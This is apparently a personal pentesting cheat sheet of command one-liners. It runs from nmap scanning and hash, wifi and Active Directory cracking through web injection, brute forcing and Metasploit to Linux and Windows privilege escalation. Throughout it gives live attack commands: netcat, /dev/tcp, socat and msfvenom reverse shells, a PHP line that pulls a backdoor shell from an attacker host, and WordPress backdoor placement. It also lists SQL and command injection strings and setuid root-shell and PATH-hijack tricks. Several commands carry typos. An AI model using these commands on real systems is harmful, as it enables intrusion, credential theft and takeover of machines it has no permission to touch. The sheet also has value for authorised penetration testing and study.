INDEX
2023-12-21 11:55 - Pentesting Notes This is just a collection of information I've gained for different stages of pentesting. Take it as a dump of information, for reference. ###################################### ENUMERATION: SCANNING ###################################### ##################################### ## NMAP ##################################### nmap -v4 -A <IP> # Give full info nmap --top-ports N # Scan top N ports - or just do `-p N` # Always make sure to scan higher port numbers to be sure nmap -A # Get OS and software info - just do `-O` for OS info nmap -Pn # Force scan - 'filtered' ports are firewalled nmap --badsum # Check for firewalls nmap --script="vuln" # Scan for vulnerabilities nmap --script="http-put" # To upload files nmap --script="smb-enum-shares" --script="smb-os-discovery" # Scan samba setails nmap --script="mysql-*" # Scrape for mysql # Set timing rules with '-T' (paranoid) and '-A' (aggressive) ##################################### ## Misc Server info ##################################### viewdns.info # Get history on website DNS dig; whois; nslookup; host nikto -host <IP> # Scans host for vulnerabilities ##################################### ## Websites ##################################### nerdydata.com # Also scan HTML for '<!--', '@' and 'ca-pub' (google publisher ID) gobuster dir -o <URL> -w <WORDLIST> # Scan website for subdirectories # Add options like `-t 4` for threads and `-x txt` to add '.txt' to wordlist items ###################################### ENUMERATION: CRACKING ###################################### ##################################### ## Contextual Info ##################################### mimkatz; hashdump # Windows hashes with NTLM stored in SAM - user info in `System32/config` unshadow # Combine user password data from `/etc/shadow` (hashes) and `/etc/passwd` (info) # Unix stores hashes in `/etc/shadow` as 'FORMAT|ROUNDS|SALT|HASH' haiti # Use to ID hashes - SHA512 hashes prefixed with '$6$' - MD5 with '$apr' cat <FILE> | openssl dgst -sha256 # Hashes a file - can be used for comparison ##################################### ## Password Cracking ##################################### john --format=raw-md5 --wordlist=<WORDLIST> hashcat # Good alternative to john but never use with '--force' john --rules=norajCommon02 # Can add rules to change wordlist processing in '/opt/john' gpg2jon # Extract hash from gpg files (asc) then run john on the hash file zip2john; rar2john; ssh2john # Extract from various files - check '/opt/john' wordlistctl # Gives a set of wordlists - https://github.com/sc0tfree/mentalist # Keyspace=CHARSET^LEN (26^4 = AAAA-ZZZZ). Hashrate=FUNC/POWER. Time=KEYSPACE/HASHRATE hashcat -a 0 -m 0 -w 4 HASH WORDLIST # Run against a custom wordlist, 4 words hashcat ... -r best64.rule --loopback # Check for permutations hashcat ... -a 3 -m 0 -w 4 HASH MASK # Scan with a given mask (format) ##################################### ## Binary Cracking ##################################### binwalk -e # Explore binary files strins <FILE> # Look for string data within a file gbd # Gnu debugger - debuggers can be complex but worth learning radare2 <FILE> # Debug binaries - ?V # [C = comments], [S = IO], [s = move]; [v = view memory], [d = debug] # [dr/drr = register debug], [afll = view functions] # Analyse raw 'main' functions with 'pdf @main' yara <RULES> <FILE> # Pattern matching files for data - also loki, thor, fenrir www.nextron-systems.com/valhalla/ # Online version ##################################### ## Encryption ##################################### https://cryptii.com/pipes/caesar-cipher # Useful for cracking ciphers # Base62 uses a-zA-Z0-9 while base64 uses +/ as well - also check for ROT47 ##################################### ## Stegonography ##################################### steghide --info <FILE> # Extracts hidden info from files steghide extract -sf <FILE> # Extract file data inside image ###################################### ENUMERATION: LOG CRAWLING ###################################### ##################################### ## PCAP ##################################### strings # Crawl pcap files more efficiently than using wireshark # APR links IPs to MACs - check for HTTPS and find key transfers ###################################### ENUMERATION: WIFI ###################################### ##################################### ## Information ##################################### # [ESSID = SSID], [BSSID = access point], [WPA-PSK = pass], [WPA-EAP = user+pass] wigle.net # Show wireless network maps by MAC ##################################### ## Cracking Passwords ##################################### aircrack-ng -b <MAC> -w <WORDLIST> -J <OUTPUT> <INPUT> # Cracks wifi passwords ###################################### ENUMERATION: ACTIVE DIRECTORY ###################################### ##################################### ## Powershell ##################################### runas.exe /netonly -user:DOMAIN\USER cmd.exe # Runs CMD without DC authentication ##################################### ## Plotting AD Structure ##################################### net user <USER> /domain # Similarly `net group` and `get accounts` # Sharpbound enumerates and Bloodhound plots - get snapshot of AD at 10am/2pm ###################################### ENUMERATION: OSINT ###################################### ##################################### ## Intelligence ##################################### otx.alienvault.com # Also virustotal - good for virus info threatintelligenceplatform.com # Performs tests on websites maltego.com # Makes an OSINT mind-map - tracking things like BTC info, threats, changes, DNS misp-project.org # Thread database, showing known malware and attackers searshsploit # Looks up vulnerabilities in exploitdb ##################################### ## Search Engines ##################################### # Use "" for exact matches - `:PDF` for pdf items only # `site:URL` focuses on one page - `-site:URL` excludes it - similarly `intitle` and `inurl` # `intitle:nginx.log` or `inurl:/certs/server.key` or `intitle:"index of"` search.censys.io # Specialist search engine shodan host <IP> ###################################### ACCESS: WEBSITES ###################################### ##################################### ## Misc ##################################### html2text # Extract website text into CLI ##################################### ## Injection ##################################### # '%00' and '0x00' terminate strings - '/.' and '....//'] bypass directory restrictions # Try to change request types on the page - e.g. POST instead of GET # If IP taken as a parameter, try '%20`ls`' or '`cat%20*`' - where '%20' is a space ?VAR=http://<IP>/shell.php # Run file server hosting a php backdoor - then set variable to it wp-content/themes/<THEME>/<FILE>.php # Wordpress: add backdoor using theme page sqlmap # Brute force SQL - 'OR 1=1 -- _' or ' OR 1-1 __' ##################################### ## Upload ##################################### # Can you overwrite a website file with an upload? Or rename files? Potential backdoor upload # Intercept page request to change client-side validation - brute force server-side # Check MIME data, magic numbers (first bytes), size limits, name limits, content limits etc. # Change magic numbers in hex editor - spoof MIME data by intercepting outgoing payload ##################################### ## Object Editing ##################################### # Try addin your own cookies, based on failed/valid logins - edit JWT? # IDOR (object reference) e.g. '?id=1234' to '?id=1000' - may be base64 or hashed # Check for parameters in page requests: JS, apis, hidden content ##################################### ## Cracking ##################################### hydra -p <PASS> -L <WORDLIST> <IP> http-post-form "/PAGE?log=^USER^&pass=^PASS^:Invalid" # Change the "Invalid" bit to some unique page data on the invalid password page hydra -p "" -L <WORDLIST> <IP> http-get-form "/:view=^USER^^PASS^:Invalid" # test GET requests # Hydra may need URL directories to end in '/' or it fails ##################################### ## Poisoning ##################################### ?php file_put_contents('shell.php', file_get_contents('http://IP/shell.php'))?> # Apache ###################################### ACCESS: SERVER SERVICES ###################################### ##################################### ## FTP ##################################### # FTP separates command and data channels - port 21 - try [anonymous:''] for credentials hydra ftp://<IP> -l <USER> -P <WORDLIST> -s <PORT> # Port usually defaults correctly ##################################### ## Mail ##################################### telnet # use 'retr' to read messages, 'list' to list them and 'del' to delete them metasploit smtp_version # Get version info of mail server # Check users with 'VRYF' and reveal aliases with 'EXPN' ##################################### ## SQL ##################################### mysql -h <IP> -u <USERNAME> -p # Remotely connect to server mysql --user=<USER> --password=<PASS> --database=<DB> --execute "" # Can do 'SHOW TABLES;' ##################################### # SAMBA ##################################### enum4linux -A # Scan for vulnerabilities - try [Anonymous:''] for credentials smbclient //<IP>/<ENDPOINT> # To connect to server smbget # To copy files ###################################### ACCESS: ACTIVE DIRECTORY ###################################### ##################################### ## Information ##################################### # Find valid credentials and add domain controller to 'resolve.conf' # NetNTLM can be internet exposed - feed valid credentials to gain access # MDT deplots OS remotely, PXE loads OS over network - can eb used to load remote OS to system ##################################### ## Exploits ##################################### # Brute forcing passwords can cause lockout - brute forcing usernames will likely not # Send GET with auth enabled and check responses # LDAP pass-back = routing LDAP back to attack IP - run openLDAP on 389 (man in the middle) # Downgrade attack: change 'ldif' with 'noanonymous,minssf=0,passcred' # Then 'ldapsearch' for 'supportedSASLMechanisms' and get 'PLAIN/LOGIN' # Dump netork traffic on 339/TCP and find plaintex password responder -I tun0 # Use rogue LDAP for sambda man in the middle - poison broadcasts gnupdate /force # Force AD (group policy) updates ###################################### ACCESS: SHELL ACCESS ###################################### ##################################### ## Information ##################################### VAR=(a,b,c); ${VAR[@]}; ${VAR[1]}; unset VAR[1]; VAR[1]=B # Bash arrays ##################################### ## Netcat ##################################### nc -lnvp <PORT> # Open reverse shell listener on attacker side nc <IP> <PORT> -e /bin/bash # Open a reverse shell on victim side (AFTER listener running) netcat-traditional # Versions of nc can have '-e' removed for security reasons socat TCP:"<IP>":"<PORT>" EXEC "bash -l:" # More stable version of netcat nc -vl <PORT> > <FILE> # Listen for file transfer nc -n <IP> <PORT> < <FILE> # Transfer file ##################################### ## Telnet ##################################### telnet <IP> <PORT> # Send arbitrary data to arbitrary ports tcpdump # To receive that data ##################################### ## Remote Shells ##################################### python3 -c "import pty; pty.spawn('/bin/bash')" # Stabilise shell with python /bin/bash -c 'bash -u >& /dev/tcp/<IP>/<PORT> 0>&1 # Move shell to another listener mkfifo /tmp/f; nc -lnvp <PORT> < /tmp/f | bash > /tmp/f 2>&1; rm /tmp/f # Quick shell transfer sudo tcpdump <IP> <PROTOCOL> \\icmp -i eth0 # reverse tunnel over tcpdump pwncat # Python package for reverse shells export TERM=xterm # Set terminal variables properly - so shell doesn't glitch out ###################################### ACCESS: METASPLOIT ###################################### ##################################### ## Setup ##################################### msfdb init # Initialise metasploit DB msfconsole # Then 'search' to list modules - 'use' to select # 'set' local vars, 'setg' global vars - 'view', 'unset', or 'save' do as you would expect search multi/handler # For relevant service show options # See all the variables to set for a given service ##################################### ## Attack ##################################### run -j # Or 'exploit' to run an attack migrate <PID> # Change PID of attack shell (hide or elevate) getuid; sysinfo, ipconfig # Get user info, system info, network info shell; powershell_shell # Opens bash and powershell respectively run post/windows/gather/checksum # Checks if the system is inside a windows VM ###################################### ELEVATION: WINDOWS ###################################### ##################################### ## Misc ##################################### msconfig # This is the main config source - '%windir% = /Windows' - compmgt comp-net-adapter; msinfo32 # Show network info, and system info /setowner users # Try to change a restricted file property ##################################### ## Services ##################################### # Look for services with 'Can Restart : True' - replace and 'net stop' 'net start' them ###################################### ELEVATION: PRIVESC ###################################### ##################################### ## Msfvenom ##################################### mfsvenom -p cmd/unix/reverse_netcat lhost=<IP> lport=<PORT> # Reverse netcat to your server ##################################### ## Misconfig ##################################### find / -perm -6000 2>/dev/null | grep '/bin/' # Look for set-UId and set-GID bits # Unquoted directory hack: '/file name' can be ignored with a binary at '/file' # If program run is scripted based on ENV variable - redirect that variable to something else # Always look in /var/backup and .bash_history sudo -l; sudo -V # Check info about sudo sudo -u#-1 # Old exploit for sudo - might still work getcap -r / 2>/dev/null # Find special permissions set on certain files perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' # Exploit if found on perl ##################################### ## Conjobs ##################################### # If cron pointing to a website, change DNS to point to attacker IP ##################################### ## Escaping Binaries ##################################### gtfobins.github.io # Escape into elevated shells from various programs that run as root ^R^X resetl sh 1>&0 2>&0 # e.g. escape nano - press enter after each ^ command # If a python file imports a module, try to override it e.g. vim ./random.py export PATH=/tmp:$PATH; echo -e "#!/bin/bash\n/bin/bash" > /tmp/date # Now "date"="bash" ###################################### ELEVATION: ESCAPE CONTAINERS ###################################### ##################################### ## Misc ##################################### id; docker images # Check system info - find a script that refers outside the container